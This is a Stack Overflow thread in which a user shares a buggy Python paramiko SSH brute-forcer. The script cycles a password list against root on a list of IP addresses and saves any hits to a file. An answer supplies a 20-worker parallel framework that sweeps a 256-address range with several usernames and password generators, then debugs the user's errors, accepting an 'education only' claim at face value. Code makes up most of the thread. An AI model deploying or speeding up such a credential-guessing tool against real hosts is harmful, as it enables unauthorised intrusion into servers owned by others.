# Multithreading my simple SSH Brute forcer

Tags: python, multithreading, ssh, brute-force

I've coded a simple SSH Bruteforcer , and I am trying to make it multi-threaded as it is running very slowly at the moment. As you can see in the last few lines I have given it an attempt, but don't understand threading fully. I have read a few examples but I don't quite understand it fully, so I felt adding into my program will make me understand it better.

Code:

```
try:
    import paramiko
except ImportError:
    print("Paramiko module not installed, exiting.")
from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime
startTime = datetime.now()


UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0

with open('pass.txt') as txt1:
    for line in txt1:
        if line.strip():
            PasswordLines += 1

with open('ip.txt') as txt2:
    for line2 in txt2:
        if line2.strip():
            IPLines += 1


current_attempts = 0
max_attempts = PasswordLines * IPLines




def print_results(found):
    while True:
        ip, password = found.get()
        print("Found: %r %r" % (ip, password))
        found.task_done()


def init(found_):
    global found
    found = found_


def generate_passwords():
    #return (line.strip() for line in open(pass_file))
    global ip
    global pwd
    global txt4
    txt3 = open(pass_file, "r")
    txt4 = open(ip_file, "r")
    for line3 in txt3.readlines():
        pwd = line3.strip()
    for line4 in txt4.readlines():
        ip = line4.strip()


def check(ip_password):
    global current_attempts
    ip, password = ip_password
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(ip, port, username=UserName2, password=pwd)
    except paramiko.AuthenticationException, e:
        print e
        print '[-] %s:%s fail!' % (UserName2, pwd)
        current_attempts += 1
    except Exception, e:
        print e
    else:
        print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
        username, password, ipaddress = UserName2, pwd, ip
        found.put((username,password,ipaddress))
        seconds_taken = datetime.now() - startTime
        print 'brute forcing took %s seconds' % seconds_taken
        ssh.close()
        print 'Found login in %s attempts' % current_attempts
        if os.path.isfile("correct.txt"):
            c = open("correct.txt", "a")
            c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
        elif os.path.isfile("correct.txt"):
            c = open('correct.txt', "w")
            c.write(ip + ':' + UserName2 + ':' + pwd)


def main():
    found = Queue()
    t = Process(target=check, args=[found])
    t.daemon = True  # do not survive the parent
    t.start()
    pool = Pool(processes=20, initializer=init, initargs=[found])
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
    for _ in pool.imap_unordered(check, args):
        pass
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete
    found.join()  # wait until all results are printed

if __name__ == "__main__":
    main()
```

Errors:

```
Exception in thread Thread-1:
Traceback (most recent call last):
  File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
    self.run()
  File "C:\Python27\lib\threading.py", line 763, in run
    self.__target(*self.__args, **self.__kwargs)
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
    ip, password = ip_password
TypeError: iteration over non-sequence


Traceback (most recent call last):
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
    main()
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable
```

Comment: Could you give us your word that this is purely for ethical purposes only?

Comment: This is for education purposes only, this was made for learning the paramiko module.

Comment: @Alex even if it isn't there are way way way more elaborate tools out there to do the job. Perfectly harmless really.

Answer (score 1):

The problem is embarrassingly parallel. You can run concurrently the ssh connection attempts both for different ips and passwords:

```
#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool

def check(params):
    ip, username, password = params

    # emulate ssh login attempt #XXX put your ssh connect code here
    import random
    successful = random.random() < .0001
    return successful, params

def main():
    creds = {}
    ips = ["168.1.2.%d" % i for i in range(256)] #XXX dummy ip list, use yours
    usernames = ["nobody", "root"] #XXX dummy user list, use yours
    def generate_args():
        for ip in ips:
            for username in usernames:
                for password in generate_passwords():
                    if (ip, username) in creds:
                        break
                    yield ip, username, password
    pool = Pool(processes=20)
    for success, params in pool.imap_unordered(check, generate_args()):
        if not success:
            continue
        print("Found: %r" % (params,))
        ip, username, password = params
        creds[ip, username] = password
    pool.close() # no more tasks
    pool.join()  # wait for all tasks in the pool to complete

if __name__=="__main__":
    main()
```

where `ips` is a list if all ips you want to try and `generate_passwords()` is a generator that yields one password at a time, here's an example:

```
def generate_passwords(pass_file):
    return (line.strip() for line in open(pass_file))
```

#### About errors

```
ValueError: too many values to unpack
```

your code has `found.put((username,password,ipaddress))` (a tuple with 3 values) but `print_results()` function expects `ip, password = found.get()` (2 values). The error *"too many values to unpack"* is because `3` is larger than `2`.

```
'NoneType' object is not iterable
```

`attempt()` function returns nothing (`None`) but you put it in the place for `generate_passwords()` that must generate passwords (see the example implementation above).

Comment: Using your code, I've edited mine up a bit, although something is wrong, the speed is still 6-7 seconds and I am getting a too many values to unpack error at line 45 and a 'NoneType' object is not iterable error at line 92

Comment: @Coder77: your code is incorrect e.g., `generate_passwords()` must generate passwords (strings), it should not make any ssh connections (you should do it in the `check()` function)

Comment: @Coder77: I've added example `generate_password()` implementation to the answer.

Comment: @Coder77: I've added the explanation for the errors.

Comment: Hi again, I've been getting these 2 other errors I do not understand, and the threading still has no effect(Same speed). Edited my code and posted the full traceback.

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/49809/discussion-between-j-f-sebastian-and-coder77)